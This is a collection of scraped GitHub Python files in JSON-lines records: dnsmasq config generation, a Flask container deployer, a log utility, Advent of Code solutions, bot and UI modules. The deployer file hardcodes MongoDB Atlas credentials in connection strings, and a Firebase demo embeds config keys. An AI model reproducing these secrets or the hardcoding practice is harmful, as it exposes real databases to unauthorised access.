surviving\n    # $$TITLE$$ / $$CONTENT$$ placeholders.\n    XHTML_TEMPLATE = HTML = '''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n    <html xmlns=\"http://www.w3.org/1999/xhtml\">\n    <head>\n        <title>$$TITLE$$</title>\n        <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n    </head>\n    <body>
        <div>\n            $$CONTENT$$\n        </div>
    </body>\n    </html>'''\n\n    MIMETYPE_TEMPLATE = \"application/epub+zip\"\n\n    def bootstrap(self):\n        # Based on the boilerplate seen in https://github.com/javierarce/epub-boilerplate\n        book_structure = ['META-INF', 'OEBPS', join('OEBPS', 'images'), join('OEBPS', 'styles'),join('OEBPS', 'text')]\n        for struct in book_structure:\n            os.makedirs(join(\"__book__\", struct), exist_ok=True)\n\n        key_files = [\"mimetype\", ]\n        file_contents = [self.MIMETYPE_TEMPLATE]\n        for file, content in zip(key_files, file_contents):  # zip() pairs each name with its content; the bare tuple would fail to unpack\n            with open(file, \"w\", encoding=\"UTF-8\") as f:\n                f.write(content)","repo_name":"RexynyN/python-learn","sub_path":"creator/epub/epubhelper.py","file_name":"epubhelper.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18413686124","text":"import ipaddress\n\nfrom pdtools.lib.output import out\n\nfrom .base import ConfigObject\nfrom .command import Command, KillCommand\n\n\ndef get_all_dhcp_interfaces(allConfigs):\n    for key in allConfigs.keys():\n        if key[0] == \"dhcp\":\n            yield allConfigs[key].interface\n\n\nclass ConfigDhcp(ConfigObject):\n    typename = \"dhcp\"\n\n    options = [\n        {\"name\": \"interface\", \"type\": str, \"required\": True, \"default\": None},\n        {\"name\": \"leasetime\", \"type\": str, \"required\": True, \"default\": \"12h\"},\n        {\"name\": \"limit\", \"type\": int, \"required\": True, \"default\": 150},\n        {\"name\": \"start\", \"type\": int, \"required\": True, \"default\": 100},\n        {\"name\": \"dhcp_option\", \"type\": list, \"required\": False, \"default\": \"\"}\n    ]\n\n\nclass ConfigDnsmasq(ConfigObject):\n    typename = \"dnsmasq\"\n\n    options = [\n        {\"name\": \"interface\", \"type\": list, \"required\": False, \"default\": None},\n        {\"name\": \"noresolv\", \"type\": bool, \"required\": False, \"default\": False},\n        {\"name\": \"server\", \"type\": list, \"required\": False, \"default\": None}\n    ]\n\n    def apply(self, allConfigs):\n        commands = list()\n\n        # visibleName will be used in choosing file names for this dnsmasq\n        # instance; it must be unique if there are multiple dnsmasq instances\n        visibleName = self.internalName\n\n        if self.interface is None:\n            interfaces = get_all_dhcp_interfaces(allConfigs)\n        else:\n            interfaces = self.interface\n\n        leaseFile = \"{}/dnsmasq-{}.leases\".format(\n            self.manager.writeDir, visibleName)\n        pidFile = \"{}/dnsmasq-{}.pid\".format(\n            self.manager.writeDir, visibleName)\n        outputPath = \"{}/dnsmasq-{}.conf\".format(\n            self.manager.writeDir, visibleName)\n\n        with open(outputPath, \"w\") as outputFile:\n            outputFile.write(\"#\" * 80 + \"\\n\")\n            outputFile.write(\"# dnsmasq configuration file generated by \"\n                             \"pdconfd\\n\")\n            outputFile.write(\"# Source: {}\\n\".format(self.source))\n            outputFile.write(\"# Section: {}\\n\".format(str(self)))\n            outputFile.write(\"#\" * 80 + \"\\n\")\n            outputFile.write(\"\\n\")\n            outputFile.write(\"dhcp-leasefile={}\\n\".format(leaseFile))\n\n            if self.noresolv:\n                outputFile.write(\"no-resolv\\n\")\n\n            if self.server:\n                for server in self.server:\n                    outputFile.write(\"server={}\\n\".format(server))\n\n            # TODO: Bind interfaces allows us to have multiple instances of\n            # dnsmasq running, but it would probably be better to have one\n            # running and reconfigure it when we want to add or remove\n            # interfaces. 
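            # For example (made-up numbers, not from any real config): an interface at
            # 192.168.1.1/255.255.255.0 with dhcp start=100, limit=150, leasetime='12h'
            # produces the line
            #     dhcp-range=192.168.1.100,192.168.1.250,12h
            # since network_address + start = .100 and firstAddress + limit = .250
            # in the arithmetic further down.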
It is not very disruptive to reconfigure and restart\n            # dnsmasq.\n            outputFile.write(\"\\n\")\n            outputFile.write(\"except-interface=lo\\n\")\n            outputFile.write(\"bind-interfaces\\n\")\n\n            for intfName in interfaces:\n                interface = self.lookup(allConfigs, \"interface\", intfName)\n                outputFile.write(\"\\n\")\n                outputFile.write(\"# Options for section interface {}\\n\".format(interface.name))\n                outputFile.write(\"interface={}\\n\".format(interface.config_ifname))\n\n                network = ipaddress.IPv4Network(u\"{}/{}\".format(\n                    interface.ipaddr, interface.netmask), strict=False)\n\n                dhcp = self.lookup(allConfigs, \"dhcp\", intfName)\n\n                # TODO: Error checking!\n                firstAddress = network.network_address + dhcp.start\n                lastAddress = firstAddress + dhcp.limit\n\n                outputFile.write(\"\\n\")\n                outputFile.write(\"# Options for section dhcp {}\\n\".format(interface.name))\n                outputFile.write(\"dhcp-range={},{},{}\\n\".format(\n                    str(firstAddress), str(lastAddress), dhcp.leasetime))\n\n                # Write options sections to the config file.\n                if dhcp.dhcp_option:\n                    for option in dhcp.dhcp_option:\n                        outputFile.write(\"dhcp-option={}\\n\".format(option))\n\n        cmd = [\"/apps/bin/dnsmasq\", \"--conf-file={}\".format(outputPath),\n               \"--pid-file={}\".format(pidFile)]\n        commands.append((self.PRIO_START_DAEMON, Command(cmd, self)))\n\n        self.pidFile = pidFile\n        return commands\n\n    def revert(self, allConfigs):\n        commands = list()\n\n        commands.append((-self.PRIO_START_DAEMON,\n                         KillCommand(self.pidFile, self)))\n\n        return commands\n","repo_name":"damouse/AnotherParadrop","sub_path":"python/paradrop/backend/pdconfd/config/dhcp.py","file_name":"dhcp.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11346658010","text":"\"\"\"\nThis file contains the core classes and functions of the project.\n\"\"\"\n\nfrom glob import glob\nimport datetime\nimport os\nimport platform\nimport logging\nFORMAT = '[%(asctime)s]-[%(funcName)s]-[%(levelname)s] - %(message)s'\nlogging.basicConfig(\n    level=logging.INFO,\n    format=FORMAT\n)\n\n\nclass Utilities:\n    def __init__(self):\n        self.name = \"Core\"\n        self.log_folder_name: str = \"captured_logs\"\n\n    def get_desktop_path(self) -> str:\n        \"\"\"Gets the path to the Desktop directory regardless\n        of the OS (Windows, Linux, Mac). On Windows, the path to the\n        Desktop might be under OneDrive.\n        Returns:\n            str: The path to the Desktop directory.\n        \"\"\"\n        # list of paths to the Desktop directory (Windows, Linux, Mac)\n        list_of_desktop_paths: list = glob(\n            os.path.expanduser(\"~//*Desktop//\"),\n            recursive=True\n        )\n        return os.path.normpath(\n            list_of_desktop_paths[0] if len(list_of_desktop_paths) == 1\n            else os.path.join(os.path.expanduser(\"~\"), \"Desktop\")\n        )\n\n    def get_os(self) -> str:\n        \"\"\"\n        Gets the OS that the program is running on.\n\n        Returns:\n            str: The OS that the program is running on. 
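        Example (illustrative, not in the original docstring):
            >>> os_mapping.get('darwin', 'Unknown OS')
            'MacOS'
            >>> os_mapping.get('freebsd', 'Unknown OS')
            'Unknown OS'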
If the OS is not\n recognized, then return \"Unknown OS\".\n \"\"\"\n system: str = platform.system().lower()\n\n os_mapping: dict = {\n 'linux': 'Linux',\n 'darwin': 'MacOS',\n 'windows': 'Windows',\n } # maps the OS to the OS name that we want to display to the user\n\n return os_mapping.get(system, 'Unknown OS')\n\n def normalize_path(self, new_directory: str) -> str:\n \"\"\"Set the new directory path to the normalized path\n of the new directory.\n Args:\n new_directory (str): The new directory to set.\n \"\"\"\n return os.path.normpath(new_directory)\n\n def generate_timestamp_YYYY_MM_DD_T_MM(self) -> str:\n \"\"\"Generate a timestamp in the format of YYYYMMDDTHHMM\n\n Example:\n Year Month Day Time Hour Minute Second (e.g 20210101T120000)\n Returns:\n str: The timestamp.\n \"\"\"\n return datetime.datetime.now().strftime(\"%Y%m%dT%H%M\")\n\n def generate_path_to_output_directory_folder(self) -> str:\n \"\"\"\n Generate the path to the output directory folder.\n Example:\n captured_logs_20210101T120000\n \"\"\"\n timestamp: str = self.generate_timestamp_YYYY_MM_DD_T_MM()\n folder_name: str = f\"{self.log_folder_name}_{timestamp}\"\n path: str = os.path.join(self.get_desktop_path(), folder_name)\n logging.info(f\"Path to output directory folder: {path}\")\n return path\n\n def create_output_directory_folder(self) -> None:\n \"\"\"Create the output directory folder if it does not exist.\n Returns:\n str: The path to the output directory folder.\n \"\"\"\n # create the output directory folder if it does not exist\n if not os.path.exists(\n self.generate_path_to_output_directory_folder()\n ):\n logging.info(\n f\"Creating output directory folder: \"\n f\"{self.generate_path_to_output_directory_folder()}\"\n )\n os.makedirs(self.generate_path_to_output_directory_folder())\n else:\n logging.info(\n f\"Output directory folder already exists: \"\n f\"{self.generate_path_to_output_directory_folder()}\"\n )\n","repo_name":"matt2ology/system-log-capture","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4606978679","text":"from functions import *\nimport sys\n\nglobal file\nglobal index\nindex = 0\n\nnumber_of_landings_index = 661\nlanding_config_index = 664\nccelig_index = 858\nfhcelig_index = 988\nrhcelig_index = 1118\nhospelig_index = 1248\niox_index = 1555\ni4o_index = 1558\naiox_index = 1561\nspare1_index = 7878\neof_index = 8753\n\ndef write_filler(sim_content,index,end_index):\n\tfor x in range(index,end_index):\n\t\tline_write(sim_content[x])\n\ndef write_top_landing(asm_content):\n\tbottom_index = asm_content.index(\"BOTTOM:\")\t\n\ttop_floor = remove_prefix(asm_content[bottom_index + 2],\"DB\")\n\t\n\tif is_hex(top_floor):\n\t\tline_write('Value= ' + str(int(remove_suffix(top_floor,\"H\"),16)+1))\n\telse:\n\t\tline_write('Value= ' + str(int(top_floor) + 1))\n\ndef write_landing_config(asm_content):\n\tnumber_of_landings = top_floor_sim(asm_content)\n\tfor x in range(number_of_landings):\n\t\tlanding = str(x + 1)\n\t\tline_write('Value Height ' + landing + ' = 10')\n\t\tline_write('Value ' + landing + ' F = True')\n\t\tline_write('Value ' + landing + ' R = False')\n\ndef write_ccelig(asm_content):\n\tnumber_of_landings = top_floor_sim(asm_content)\n\tfor x in range(number_of_landings):\n\t\tlanding = str(x + 1)\n\t\tline_write('Value ' + landing + ' F = True')\n\t\tline_write('Value ' + landing + ' R = False')\t\t\n\ndef 
write_inputs(sim_inputs):\n\tspare_number = 1\n\tfor x in range(8):\n\t\tfor y in range(8):\n\t\t\tif sim_inputs[x][7-y] == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tline_write('[SpareSwComboBox' + str(spare_number))\n\t\t\t\tline_write('Value= ' + sim_inputs[x][7-y])\n\t\t\t\tline_write('')\n\t\t\t\tspare_number += 1\n\t\t\t\t\ndef write_iox_boards(asm_content):\n\tiox_boards_index = asm_content.index(\"LOBBY:\") + 40\n\tline_write('Value= ' + str(remove_suffix(remove_prefix(asm_content[iox_boards_index],\"DB\"),\"H\")[-1:]))\n\ndef write_i4o_boards(asm_content):\n\tiox_boards_index = asm_content.index(\"LOBBY:\") + 40\n\tline_write('Value= ' + str(remove_suffix(remove_prefix(asm_content[iox_boards_index],\"DB\"),\"H\")[-2:-1]))\n\ndef line_write(text):\n\tglobal index\n\tglobal file\n\tfile.write(text + '\\n')\n\tindex += 1\n\t\nfilestring = \"G:/Software/Product/\" + str(sys.argv[2]) + \"/\" + str(sys.argv[1]) + \".asm\"\n\nwith open(filestring,\"r\") as file:\n\tasm_content = file.readlines()\nasm_content = [x.strip() for x in asm_content]\nfor x in range(len(asm_content)):\n\tasm_content[x] = remove_comments(asm_content[x])\nasm_content = list(filter(None,asm_content))\n\nwith open(\"sim_base.sdf\",\"r\") as f:\n\tsim_content = f.readlines()\nsim_content = [x.strip() for x in sim_content]\n\nsim_inputs = sim_inputs(asm_content)\n\n\nfilewritestring = \"C:/Simulator/\" + str(sys.argv[1]) + \".sdf\"\nfile = open(filewritestring,\"w\")\n\nwrite_filler(sim_content,index,number_of_landings_index)\nwrite_top_landing(asm_content)\nwrite_filler(sim_content,index,landing_config_index)\nwrite_landing_config(asm_content)\nwrite_filler(sim_content,index,ccelig_index)\nwrite_ccelig(asm_content)\nwrite_filler(sim_content,index,iox_index)\nwrite_iox_boards(asm_content)\nwrite_filler(sim_content,index,i4o_index)\nwrite_i4o_boards(asm_content)\nwrite_filler(sim_content,index,spare1_index)\nwrite_inputs(sim_inputs)\nwrite_filler(sim_content,index,eof_index)\n","repo_name":"ballj19/mce","sub_path":"mods/mods/bin/Helpers/simbuilder.py","file_name":"simbuilder.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24699024462","text":"from asyncio.log import logger\nimport logging\nfrom platform import node\nimport requests\nfrom flask import Flask, jsonify, request\nimport subprocess\nfrom time import sleep\nimport pymongo\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\n\n# from rich import print\n\nclient = \"mongodb://ias_mongo_user:ias_password@cluster0-shard-00-00.doy4v.mongodb.net:27017,cluster0-shard-00-01.doy4v.mongodb.net:27017,cluster0-shard-00-02.doy4v.mongodb.net:27017/ias_database?ssl=true&replicaSet=atlas-ybcxil-shard-0&authSource=admin&retryWrites=true&w=majority\"\ndb_name = \"ias_database\"\nclient = pymongo.MongoClient(client)\nmydb = client[db_name]\nservices_config_coll = mydb[\"services_config\"]\n\napp = Flask(__name__)\n\n\napp.config['SECRET_KEY'] = \"SuperSecretKey\"\napp.config['MONGO_URI'] = \"mongodb://ias_mongo_user:ias_password@cluster0-shard-00-00.doy4v.mongodb.net:27017,cluster0-shard-00-01.doy4v.mongodb.net:27017,cluster0-shard-00-02.doy4v.mongodb.net:27017/ias_database?ssl=true&replicaSet=atlas-ybcxil-shard-0&authSource=admin&retryWrites=true&w=majority\"\n\n\nmongo_db = PyMongo(app)\ndb = mongo_db.db\n\n\n# localhost_ip_address = \"172.17.0.1\"\n\npub_ip = requests.get(\"http://api.ipify.org\").content.decode()\nlocalhost_ip_address = pub_ip\n# 
localhost_ip_address = \"localhost\"\n\n\n\n\n###################################################################\n\n@app.route('/run', methods=[\"POST\"])\ndef runImg():\n\n # this request will always be POST request\n \n\n logging.warning(\"got request from scheduler\")\n recieved_json = request.get_json()\n model_port=recieved_json['port_num']\n \n \n\n logging.warning(f\"recieved_json = {recieved_json}\")\n\n\n service_ports = services_config_coll.find()\n node_service_port = service_ports[0]['node_service']\n\n node_manager_url = f\"http://{localhost_ip_address}:\" +str(node_service_port) + \"/getNode\"\n logging.warning(f\"sending request to node manager @ \\n{node_manager_url}\")\n logging.warning(f\"length = {len(node_manager_url)}\")\n resp = requests.get(\n node_manager_url\n ).content.decode()\n\n node_endpoint = resp\n\n #url = req['url']\n logging.warning(f\"got back from node manager, response = {node_endpoint}\")\n recieved_json['url'] = node_endpoint\n actual_ip = node_endpoint.split(\":\")[1].replace(\"/\", \"\")\n logging.warning(f'splitted = {node_endpoint.split(\":\")[1].replace(\"/\", \"\")}')\n \n\n #######################\n #######################\n #######################\n\n if \"schedule_type\" in recieved_json.keys() and recieved_json['schedule_type'] == 1:\n # MODEL DEPLOY REQUEST\n model_name=recieved_json['model_name']\n logger.warning(f\"GOT MODEL shceduling reeust {recieved_json['schedule_type'] == 1}\")\n recieved_json['fpath'] = 'model_repo/' + recieved_json['model_name']\n logging.warning(\"hello, {recieved_json}\")\n \n logging.warning(f\"node_endpoint = {node_endpoint}\")\n\n ##\n url_to_request = f\"{node_endpoint}/runapp\"\n logging.warning(f\"url_to_request = {url_to_request}\")\n res = requests.post(url=url_to_request,\n json=recieved_json).json()\n \n logging.warning(f\"res = {res}\")\n \n recieved_json['container_name'] = res['container_name']\n recieved_json['model_name'] = model_name\n recieved_json['vm_ip'] = actual_ip\n recieved_json['model_port'] = model_port\n recieved_json['_id'] = res['container_name']\n\n logging.warning(f\"recieved_json['container_name'] = {recieved_json['container_name']}\")\n # recieved_json[\"config_id\"] = recieved_json[\"config_id\"])\n try:\n db.deployer_log.insert_one(recieved_json)\n \n except Exception as er:\n logging.warning(er)\n pass\n \n\n else:\n # APP DEPLOY REQUEST\n app_name=recieved_json['app_name']\n recieved_json['fpath'] = 'application_repo/' + recieved_json['app_name']\n logging.warning(\"hello, {recieved_json}\")\n\n actual_config = db.configuration.find_one(\n {\"_id\": ObjectId(recieved_json[\"config_id\"])}\n )\n\n logging.warning(f\"actual_config = {actual_config}\")\n\n recieved_json[\"config\"] = actual_config\n\n if '_id' in recieved_json[\"config\"]:\n del recieved_json[\"config\"]['_id']\n\n # SENDING REQUEST TO NODE\n logging.warning(f\"node_endpoint = {node_endpoint}\")\n\n recieved_json['schedule_type'] = 2\n\n url_to_request = f\"{node_endpoint}/runapp\"\n logging.warning(f\"url_to_request = {url_to_request}\")\n res = requests.post(url=url_to_request,\n json=recieved_json).json()\n \n recieved_json['container_name'] = res['container_name']\n recieved_json['_id'] = f\"{app_name}_{recieved_json['config_id']}\"\n logging.warning(f\"recieved_json['container_name'] = {recieved_json['container_name']}\")\n # recieved_json[\"config_id\"] = recieved_json[\"config_id\"])\n \n \n \n try:\n db.deployer_log.insert_one(recieved_json)\n except Exception as er:\n logging.warning(er)\n pass\n \n 
return 'Request sent to the node for deploying'\n\n\n@app.route('/kill', methods=[\"POST\"])\ndef killImg():\n    logging.warning(\"In KILL request\")\n    if request.method == 'POST':\n        received_json = request.get_json()\n        if received_json is None:\n            logging.warning(\"killImg was called without a JSON body\")\n\n        logging.debug(f\"received_json = {received_json}\")\n        # data = db.deployer_log.find_one(\n        #     {\"app_name\": received_json['app_name']})\n\n        configuration_document = db.deployer_log.find_one(\n            {\"config_id\": received_json[\"config_id\"]})\n        container_name_to_kill = configuration_document[\"container_name\"]\n        url_of_node = configuration_document[\"url\"]\n\n        # url = received_json['url']\n        logging.debug(\"got KILL request\")\n        logging.warning(f\"received_json = {received_json}\")\n        # logging.warning(f\"data = {received_json}\")\n        db.deployer_log.delete_one({'app_name': received_json['app_name']})\n        res = requests.post(url=url_of_node + \"/killapp\",\n                            json={'container_name': container_name_to_kill})\n        logging.warning(res.content)\n\n    return \"Killed\"\n\n\nif __name__ == '__main__':\n\n    service_ports = services_config_coll.find()\n\n    deployer_service_port = service_ports[0]['deployer_service']\n\n    app.run(debug=True,use_reloader=False, host='0.0.0.0', port=deployer_service_port)\n","repo_name":"Adigoo/IAS-Project-Group-5","sub_path":"deployer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43190159776","text":"def problem_1(num_list, total = 2020):\n    for num in num_list:\n        if (total-num) in num_list:\n            return num * (total-num)\n    return None\n\ndef problem_2(num_list):\n    for num1 in num_list:\n        for num2 in num_list:\n            if (2020-num1-num2) in num_list:\n                return num1 * num2 * (2020-num1-num2)\n    return None\n\ndef recursive(num_list, rounds, total = 2020):\n    if rounds == 1:\n        if total in num_list:\n            return total\n        else:\n            return None\n    start = -1\n    end = len(num_list)\n    for num in num_list:\n        start += 1\n        solution = recursive(num_list[start:end], rounds-1, total-num)\n        if solution:\n            return num * solution\n    return None\n\n\nwith open('input.txt') as file:\n    index = 0\n    lines = file.readlines()\n    nums = lines\n    for line in nums:\n        nums[index] = int(lines[index])\n        index += 1\n\n    print('Problem 1: ', problem_1(nums))\n    print('Problem 2: ', problem_2(nums))\n\n    print('Problem 1 recursive: ', recursive(nums, 2))\n    print('Problem 2 recursive: ', recursive(nums, 3))\n","repo_name":"mwnewm/AdventOfCode","sub_path":"2020/dec_01/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32059294770","text":"import threading\n\nport = 5000\npid = 1\n\nip_list = ['191.52.7.28', '191.52.7.27', '191.52.7.26']\n\nlock = threading.Lock()\n\n# (event name, logical clock counter, pid)\nevent_list = [] \nevent_list_global = [] \nevent_count = 0\nevents_queue = []","repo_name":"Lima001/BCC-Sistemas-Distribuidos","sub_path":"Ordenacao de Processos/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9495787455","text":"'''\r\nPython 
PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\"\"\"\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n### Personalidade padrão do @mate_obot\nfrom ...aiogram_bot.callbacks import (\n command_callback,\n message_callback,\n)\nfrom ....models import Iteration\nfrom ..default import (\n start,\n help,\n info,\n portaria,\n welcome,\n furhat_contains_iterations as furhat_contains_iterations_default,\n furhat_endswith_iterations,\n furhat_startswith_iterations,\n add_handlers as add_default_handlers,\n)\n\ntry:\n from instance.personalidades.matebot import random_texts\nexcept Exception as e:\n logger.debug(f\"random_texts em instance não encontrada para {__name__}\")\n # ~ logger.exception(e)\n try:\n from . import random_texts\n except Exception as e1:\n logger.debug(f\"no random_texts at all for {__name__}\")\n # ~ logger.exception(e1)\n\nasync def add_handlers(dispatcher):\n await add_default_handlers(dispatcher)\n ## BOFH\n @dispatcher.message_handler(\n commands = ['bofh'],\n )\n async def bofh_callback(message):\n await message_callback(message, ['personalidades', 'matebot',\n 'bofh', message.chat.type])\n command = await message.reply(await random_texts.bofh())\n await command_callback(command, ['personalidades', 'matebot',\n 'bofh', message.chat.type])\n\n## Furhat\nasync def furhat_desculpa(config, message):\n return await random_texts.bofh()\n\nasync def furhat_contains_iterations():\n return (await furhat_contains_iterations_default()) + [\n Iteration(text = subtext, callback = furhat_desculpa,\n ) for subtext in [\n 'não tá funcionando',\n 'internet tá ruim',\n 'wi-fi tá ruim',\n 'not working',\n ]\n ]\n","repo_name":"iuriguilherme/iacecil","sub_path":"src/iacecil/controllers/personalidades/matebot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"2374004209","text":"from context import Context\n\n\ndef delete_dax_table(dyn_resource=None):\n \"\"\"\n Deletes the demonstration table.\n :param dyn_resource: Either a Boto3 or DAX resource.\n \"\"\"\n table_name = Context.dynamodb_table\n all_tables = []\n if dyn_resource is None:\n dynamodb = Context.dynamodb_local\n for table in dynamodb.tables.all():\n all_tables.append(table.name)\n if table_name not in all_tables:\n print(f\"Table does not exist\")\n return False\n\n table = dynamodb.Table(table_name)\n table.delete()\n\n print(f\"Deleting {table.name}...\")\n table.wait_until_not_exists()\n print(f\"Deleting {table.name} complete\")","repo_name":"Elvis-aws/Python-API-Framework","sub_path":"API/deleteTable.py","file_name":"deleteTable.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74661412963","text":"import threading\n\nport = 5000\npid = 1\n\nip_list = ['191.52.7.28', '191.52.7.27', '191.52.7.26']\n\nlock = threading.Lock()\n\n# (nome do evento, contador relógio lógico, pid)\nevent_list = [] \nevent_list_global = [] \nevent_count = 0\nevents_queue = []","repo_name":"Lima001/BCC-Sistemas-Distribuidos","sub_path":"Ordenacao de Processos/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9495787455","text":"'''\r\nPython 
Firebase Course for\r\nBeginners\r\nhttps://codeloop.org/python-firebase-course-for-beginners/\r\n'''\r\nimport pyrebase\r\n\r\nconfig = {\r\n\"apiKey\": \"AIdkIZxU\",\r\n\"authDomain\": \"esp32-aleatorios.firebaseapp.com\",\r\n\"databaseURL\": \"https://esp3db.firebaseio.com\",\r\n\"projectId\": \"esp32-aleatorios\",\r\n\"storageBucket\": \"esp32-aleatorios.appspot.com\",\r\n\"messagingSenderId\": \"197640\",\r\n\"appId\": \"1:19740:web:160bd9a125e895\",\r\n\"measurementId\": \"G-G3Z1\"\r\n}\r\n#create authetication\r\nfirebase = pyrebase.initialize_app(config)\r\n#accesing database in firebase\r\ndb = firebase.database()\r\ndata = {\"name\":\"Ignacio Altamirano\"}\r\ndata1 = {\"job\":\"Periodista\"}\r\ndb.child(\"users\").push(data)\r\ndb.child(\"users\").push(data1)\r\nprint(\"Data added to real time database \")\r\n","repo_name":"etorresr/IoT_Python","sub_path":"ejer2.py","file_name":"ejer2.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16507455292","text":"from DataModelDict import DataModelDict as DM\n\nfrom .. import PotentialGenerator\n\n__all__ = ['LIBRARY']\nclass LIBRARY(PotentialGenerator):\n def __init__(self, libfile=None, paramfile=None,\n id=None, key=None, pot_id=None, pot_key=None,\n units='metal', atom_style='atomic', pair_style='meam',\n pair_style_terms=None,\n elements=None, masses=None, symbols=None):\n \n # Set default values for format\n\n # Call PotentialGenerator's init\n PotentialGenerator.__init__(self, id=id, key=key, pot_id=pot_id, pot_key=pot_key,\n units=units, atom_style=atom_style, pair_style=pair_style,\n pair_style_terms=None,\n elements=elements, masses=masses, symbols=symbols)\n \n # Set format-specific parameters\n if libfile is not None:\n self.libfile = libfile\n else:\n raise ValueError('libfile must be given')\n if paramfile is not None:\n self.paramfile = paramfile\n else:\n self.paramfile = 'NULL'\n \n def buildpaircoeff(self):\n paircoeff = DM()\n paircoeff.append('term', DM([('file', self.libfile)]))\n paircoeff.append('term', DM([('option', self.symbollist)]))\n paircoeff.append('term', DM([('file', self.paramfile)]))\n paircoeff.append('term', DM([('symbols', 'True')]))\n \n return paircoeff","repo_name":"lmhale99/iprPy_diatom_scan","sub_path":"iprPy/tools/potential_generator_formats/LIBRARY.py","file_name":"LIBRARY.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16396931347","text":"# vowels = ['a', 'e', 'i', 'o', 'u']\n# # word = input(\"Provide a word to search for vowels: \")\n# word = \"i have to know the truth\"\n# found = {'a': 0,'u': 0, 'e': 0,'i': 0,'o': 0}\n# for letter in word:\n# if letter in vowels:\n# # if letter not in found:\n# # found.append(letter)\n# found[letter] += 1\n# # for vowel in found:\n# # print(vowel)\n# print(found)\n# print(sorted(found.items()))\n# for k in found:\n# print(k, 'was found',found[k],'time(s).')\n# for k,v in sorted(found.items()):\n# print(k, 'was found',v,'time(s).')\n\n#\n# def findvowels(word:str)->set:\n# \"\"\"try this out\"\"\"\n# vowels = set('aeiou')\n# found = vowels.intersection(word)\n# return ''.join(found)\n#\n#\n# print(findvowels(\"word is a word\"))\n#\n# help(findvowels)\n\nimport vsearch\n\nfound = vsearch.search4letters('this is not a sentence.')\nfor everything in found:\n 
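# search4letters presumably does what the commented-out findvowels above sketches:\n    # intersect set('aeiou') with the input phrase and return the matched vowels.\n    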
print(everything)","repo_name":"aiolosluf/python","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38246198013","text":"from __future__ import annotations\n\nfrom abc import abstractmethod\nfrom contextlib import AbstractContextManager, contextmanager\nfrom types import TracebackType\nfrom typing import Iterator, Optional, Type\n\nfrom ._boot_mode import BootMode\n\n\nclass AbstractBootModeControl(AbstractContextManager[\"AbstractBootModeControl\"]):\n \"\"\"ABC for boot mode control.\"\"\"\n\n @property\n @abstractmethod\n def default_mode(self) -> BootMode:\n \"\"\"Return the default boot mode.\n\n When used as a context manager, this class switches to the default\n mode on enter and exit.\n \"\"\"\n ...\n\n @abstractmethod\n def get_mode(self) -> BootMode:\n \"\"\"Return the current boot mode.\"\"\"\n ...\n\n @abstractmethod\n def set_mode(self, value: BootMode) -> None:\n \"\"\"Set the boot mode.\"\"\"\n ...\n\n @contextmanager\n def scoped(self, value: BootMode) -> Iterator[None]:\n \"\"\"Switch to the given boot mode while in the context manager.\"\"\"\n previous_mode = self.get_mode()\n try:\n self.set_mode(value)\n yield\n finally:\n self.set_mode(previous_mode)\n\n def __enter__(self) -> AbstractBootModeControl:\n self.set_mode(self.default_mode)\n return self\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> None:\n self.set_mode(self.default_mode)\n","repo_name":"sbtinstruments/wright","sub_path":"wright/device/control/boot_mode/_abc.py","file_name":"_abc.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37019106011","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\shared\\fitting\\fittingWnd.py\r\nfrom carbonui import const as uiconst\r\nfrom carbonui.primitives.container import Container\r\nfrom carbonui.primitives.containerAutoSize import ContainerAutoSize\r\nfrom carbonui.primitives.layoutGrid import LayoutGrid\r\nfrom carbonui.util.various_unsorted import SetOrder\r\nfrom eve.client.script.ui.control.buttons import ButtonIcon\r\nfrom eve.client.script.ui.control.eveLabel import EveLabelMediumBold, EveLabelMedium\r\nfrom eve.client.script.ui.control.eveWindow import Window\r\nfrom eve.client.script.ui.shared.fitting.baseFitting import Fitting\r\nfrom eve.client.script.ui.shared.fitting.cleanShipButton import CleanShipButton\r\nfrom 